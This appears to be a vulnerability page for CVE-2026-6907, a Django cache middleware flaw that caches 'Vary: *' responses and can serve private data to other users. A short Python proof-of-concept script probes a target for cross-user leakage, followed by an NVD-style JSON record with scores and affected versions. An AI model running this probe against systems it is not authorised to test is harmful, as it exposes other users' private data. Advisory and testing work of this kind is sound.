CVE-2026-6907

import requests # Conceptual Proof of Concept for CVE-2026-6907 # This script demonstrates checking for private data leakage via caching. target_url = "http://vulnerable-django-app/api/user/profile" # Step 1: Simulate a request from User A that triggers caching with Vary: * # The server responds with User A's private data and sets Vary: * print("[*] Step 1: Sending request as User A (authenticated)...") headers_user_a = { "Authorization": "Bearer token_user_a_secret", "User-Agent": "PoC-Scanner" } response_a = requests.get(target_url, headers=headers_user_a) print(f" Status: {response_a.status_code}") print(f" Vary Header: {response_a.headers.get('Vary')}") print(f" Content Snippet: {response_a.text[:100]}") # Step 2: Simulate a request from User B (or anonymous) to the same URL # If the vulnerability exists, the cache serves User A's data to User B print("\n[*] Step 2: Sending request as User B (different context)...") headers_user_b = { "Authorization": "Bearer token_user_b_public", # Different token "User-Agent": "PoC-Scanner" } response_b = requests.get(target_url, headers=headers_user_b) print(f" Status: {response_b.status_code}") print(f" Content Snippet: {response_b.text[:100]}") # Step 3: Verify data leakage if "token_user_a_secret" in response_b.text or "private_data_of_a" in response_b.text: print("\n[!] Vulnerability Confirmed: Private data from User A leaked to User B via cache.") else: print("\n[+] Vulnerability not reproduced or target is patched.")

{"cve": {"id": "CVE-2026-6907", "sourceIdentifier": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "published": "2026-05-05T16:16:18.227", "lastModified": "2026-05-07T14:16:04.940", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in 6.0 before 6.0.5 and 5.2 before 5.2.14.\n`django.middleware.cache.UpdateCacheMiddleware` erroneously caches requests where the `Vary` header contained an asterisk (`'*'`). This can lead to private data being stored and served.\nEarlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected.\nDjango would like to thank Ahmad Sadeddin for reporting this issue."}], "metrics": {"cvssMetricV40": [{"source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-524"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.2", "versionEndExcluding": "5.2.14", "matchCriteriaId": "5AD5B44B-7569-458C-8F44-3021D9CC577C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0", "versionEndExcluding": "6.0.5", "matchCriteriaId": "30ADB5F4-66B5-4015-BB55-CCB31106AB95"}]}]}], "references": [{"url": "https://docs.djangoproject.com/en/dev/releases/security/", "source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "tags": ["Vendor Advisory"]}, {"url": "https://groups.google.com/g/django-announce", "source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "tags": ["Third Party Advisory"]}, {"url": "https://www.djangoproject.com/weblog/2026/may/05/security-releases/", "source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "tags": ["Vendor Advisory"]}]}}